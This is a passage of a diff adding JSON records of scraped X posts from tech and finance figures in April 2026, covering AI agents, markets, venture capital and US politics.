"😳", + "url": "https://x.com/pmarca/status/2048677114480873657", + "published_at": "2026-04-27T08:14:21+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "cc @BrendanEich", + "url": "https://x.com/pmarca/status/2048675385119019444", + "published_at": "2026-04-27T08:07:29+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://x.com/pmarca/status/2048674564314685477", + "published_at": "2026-04-27T08:04:13+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "But \"A Disservice To Those Who Are Watching\" is the name of this show!", + "url": "https://x.com/pmarca/status/2048673940072251670", + "published_at": "2026-04-27T08:01:44+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "cc @elonmusk", + "url": "https://x.com/pmarca/status/2048673488383447437", + "published_at": "2026-04-27T07:59:56+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "When one thing becomes abundant and cheap, another thing becomes scarce and valuable.", + "url": "https://x.com/pmarca/status/2048624098398650608", + "published_at": "2026-04-27T04:43:41+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Imagine if he heard how the world really worked. Wonder what manifesto would say then.\"", + "url": "https://x.com/pmarca/status/2048621340408844368", + "published_at": "2026-04-27T04:32:43+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Image", + "url": "https://x.com/pmarca/status/2048620511912194339", + "published_at": "2026-04-27T04:29:26+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "The apps can rewrite the files. 👀", + "url": "https://x.com/pmarca/status/2048615807190769738", + "published_at": "2026-04-27T04:10:44+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!", + "url": "https://x.com/paulg/status/2048615296613937201", + "published_at": "2026-04-27T04:08:42+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases.", + "url": "https://x.com/pmarca/status/2048614869352714619", + "published_at": "2026-04-27T04:07:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "🇺🇸", + "url": "https://x.com/pmarca/status/2048614659595583651", + "published_at": "2026-04-27T04:06:10+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases (in the universe).", + "url": "https://x.com/pmarca/status/2048614305705386433", + "published_at": "2026-04-27T04:04:46+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Concerning.", + "url": "https://x.com/pmarca/status/2048612144871264609", + "published_at": "2026-04-27T03:56:11+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Self recommending!", + "url": "https://x.com/pmarca/status/2048610397243265189", + "published_at": "2026-04-27T03:49:14+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", + "url": "https://x.com/GaryMarcus/status/2048608025464705084", + "published_at": "2026-04-27T03:39:49+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grok Imagine", + "url": "https://x.com/elonmusk/status/2048600964102246438", + "published_at": "2026-04-27T03:11:45+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Self recommending recommending.", + "url": "https://x.com/pmarca/status/2048598334492033455", + "published_at": "2026-04-27T03:01:18+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://x.com/pmarca/status/2048597298150875169", + "published_at": "2026-04-27T02:57:11+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic principle, either.\n\n𝗪𝗵𝗶𝗰𝗵 𝗶𝘀 *𝗲𝘅𝗮𝗰𝘁𝗹𝘆* 𝘄𝗵𝘆 𝘄𝗲 𝘀𝗵𝗼𝘂𝗹𝗱 𝗻𝗼𝘁 𝘁𝗿𝘂𝘀𝘁 𝗰𝗼𝗱𝗶𝗻𝗴 𝗮𝗴𝗲𝗻𝘁𝘀.", + "url": "https://x.com/GaryMarcus/status/2048593283639894520", + "published_at": "2026-04-27T02:41:14+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://x.com/pmarca/status/2048591674688037210", + "published_at": "2026-04-27T02:34:50+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", + "url": "https://x.com/elonmusk/status/2048589691054694406", + "published_at": "2026-04-27T02:26:57+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can’t get even close.", + "url": "https://x.com/GaryMarcus/status/2048589239915577837", + "published_at": "2026-04-27T02:25:10+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Did a Claw post this?\"", + "url": "https://x.com/pmarca/status/2048589233095643240", + "published_at": "2026-04-27T02:25:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", + "url": "https://x.com/GaryMarcus/status/2048582672163995766", + "published_at": "2026-04-27T01:59:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Incredible writing from @euphoriaHBO", + "url": "https://x.com/jason/status/2048580651985604783", + "published_at": "2026-04-27T01:51:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", + "url": "https://x.com/GaryMarcus/status/2048580122521780676", + "published_at": "2026-04-27T01:48:56+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.", + "url": "https://x.com/GaryMarcus/status/2048579079121555764", + "published_at": "2026-04-27T01:44:47+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "the difference is that we don’t *hype* giving 12 year-olds bulldozers.\n\n*of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point.\n\nvibe coding without considerable experience is like driving without a license.", + "url": "https://x.com/GaryMarcus/status/2048578055283880296", + "published_at": "2026-04-27T01:40:43+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Now, software is just the prompt for the next version of the software.\"", + "url": "https://x.com/pmarca/status/2048573035616375134", + "published_at": "2026-04-27T01:20:46+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: Never ever use generative AI for anything critical. \n\nThe technology is probablistic all the way down and therefore inherently unreliable. \n\nWhy is this so hard to understand? \n\nIt’s wild how many seemingly smart people have drunk the cool aid on this.", + "url": "https://x.com/GaryMarcus/status/2048570082843082905", + "published_at": "2026-04-27T01:09:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Generative AI as the Hindenberg", + "url": "https://x.com/GaryMarcus/status/2048567837221089669", + "published_at": "2026-04-27T01:00:07+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Is it me or X starting to look like a vibe coded mess?\n\nPolls are broken.\n\nAccounts are getting hacked.\n\nMy DMs are full of phishing scams.\n\nBasics that used to work no longer work.", + "url": "https://x.com/GaryMarcus/status/2048558998325166498", + "published_at": "2026-04-27T00:25:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", + "url": "https://x.com/sama/status/2048554097985593849", + "published_at": "2026-04-27T00:05:31+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:", + "url": "https://x.com/GaryMarcus/status/2048553390540734479", + "published_at": "2026-04-27T00:02:43+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Total AI disaster, totally predictable", + "url": "https://x.com/GaryMarcus/status/2048552931923013916", + "published_at": "2026-04-27T00:00:53+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", + "url": "https://x.com/sama/status/2048552677433643427", + "published_at": "2026-04-26T23:59:53+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Remember this", + "url": "https://x.com/elonmusk/status/2048543344746250466", + "published_at": "2026-04-26T23:22:48+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grad school indoctrination camps", + "url": "https://x.com/elonmusk/status/2048535299102265720", + "published_at": "2026-04-26T22:50:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", + "url": "https://x.com/HarryStebbings/status/2048531257399664920", + "published_at": "2026-04-26T22:34:46+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases.", + "url": "https://x.com/pmarca/status/2048515643268567431", + "published_at": "2026-04-26T21:32:43+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat radicalized him were the same talking points repeated every day on the left.", + "url": "https://x.com/elonmusk/status/2048512831692452091", + "published_at": "2026-04-26T21:21:33+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://x.com/DavidSacks/status/2048502978626113625", + "published_at": "2026-04-26T20:42:24+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTimesPR is presenting this as a controversy, when in fact it’s the private company playbook in 2026. \n\nAnother hit job from the NYT", + "url": "https://x.com/jason/status/2048487905543237675", + "published_at": "2026-04-26T19:42:30+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇", + "url": "https://x.com/HarryStebbings/status/2048486182904852537", + "published_at": "2026-04-26T19:35:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail.", + "url": "https://x.com/ylecun/status/2048469956627468510", + "published_at": "2026-04-26T18:31:11+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Ok @Acosta, balls in your court", + "url": "https://x.com/jason/status/2048465651723882972", + "published_at": "2026-04-26T18:14:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", + "url": "https://x.com/jason/status/2048463405590225173", + "published_at": "2026-04-26T18:05:09+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://x.com/DavidSacks/status/2048456433981591867", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon.", + "url": "https://x.com/ylecun/status/2048453901930660058", + "published_at": "2026-04-26T17:27:23+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://x.com/jason/status/2048450286902235560", + "published_at": "2026-04-26T17:13:01+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", + "url": "https://x.com/jason/status/2048437340218044499", + "published_at": "2026-04-26T16:21:34+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Does a government shutdown negatively impact the stock market?\n\nNo.\n\nThe S&P 500 has gained an average of 0.4% during prior shutdowns and is up 4.8% during the current shutdown which is the longest in history at 70 days and counting.\n\n$SPX", + "url": "https://x.com/charliebilello/status/2048436641451155650", + "published_at": "2026-04-26T16:18:48+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", + "url": "https://x.com/jason/status/2048436081725464959", + "published_at": "2026-04-26T16:16:34+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” problem. It’s not.", + "url": "https://x.com/elonmusk/status/2048435593244237849", + "published_at": "2026-04-26T16:14:38+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way.", + "url": "https://x.com/ylecun/status/2048432684930654430", + "published_at": "2026-04-26T16:03:04+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://x.com/sama/status/2048428561481265539", + "published_at": "2026-04-26T15:46:41+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", + "url": "https://x.com/sama/status/2048426122854228141", + "published_at": "2026-04-26T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The 12.5% gain in the S&P 500 over the last 4 weeks was the 20th biggest 4-week advance for the index since 1950. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://x.com/charliebilello/status/2048419415222259820", + "published_at": "2026-04-26T15:10:21+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating.", + "url": "https://x.com/HarryStebbings/status/2048418806867870115", + "published_at": "2026-04-26T15:07:55+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://x.com/DavidSacks/status/2048417712439689346", + "published_at": "2026-04-26T15:03:35+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", + "url": "https://x.com/paulg/status/2048413815675539816", + "published_at": "2026-04-26T14:48:06+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", + "url": "https://x.com/paulg/status/2048413578789634100", + "published_at": "2026-04-26T14:47:09+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Durer was the original Dr Seuss.", + "url": "https://x.com/paulg/status/2048411898081583547", + "published_at": "2026-04-26T14:40:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", + "url": "https://x.com/paulg/status/2048411021329453562", + "published_at": "2026-04-26T14:36:59+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The stock market is at an all-time high.\n\nCredit spreads are near all-time lows.\n\nAnd inflation has been above the Fed's target level for 61 consecutive months, averaging 4% per year since 2019.\n\nSo why is the Fed expanding its balance sheet (QE)?\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s", + "url": "https://x.com/charliebilello/status/2048406550897729561", + "published_at": "2026-04-26T14:19:13+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: On March 30, the S&P 500 was down 7% in 2026, the 12th worst start to a year in history. After one of the biggest 4-week rallies ever, it's now up +5% YTD and above the average year at this point in time (+3%). There is no impossible in markets.\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://x.com/charliebilello/status/2048401720540061794", + "published_at": "2026-04-26T14:00:02+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", + "url": "https://x.com/HarryStebbings/status/2048400836024283246", + "published_at": "2026-04-26T13:56:31+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", + "url": "https://x.com/jason/status/2048399674269213067", + "published_at": "2026-04-26T13:51:54+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", + "url": "https://x.com/ylecun/status/2048399621492236615", + "published_at": "2026-04-26T13:51:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Global Inflation Rates are on the RISE...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s", + "url": "https://x.com/charliebilello/status/2048397937156518387", + "published_at": "2026-04-26T13:45:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", + "url": "https://x.com/paulg/status/2048396013816152216", + "published_at": "2026-04-26T13:37:21+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: With the exception of Bitcoin, every major asset class is now in positive territory on the year...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://x.com/charliebilello/status/2048394162366533935", + "published_at": "2026-04-26T13:30:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The S&P 500 ended the week at another all-time high, its 9th of the year. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://x.com/charliebilello/status/2048390341221404827", + "published_at": "2026-04-26T13:14:49+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Good use of camouflage by Biscuit.", + "url": "https://x.com/paulg/status/2048370801833828507", + "published_at": "2026-04-26T11:57:10+00:00", + "source": 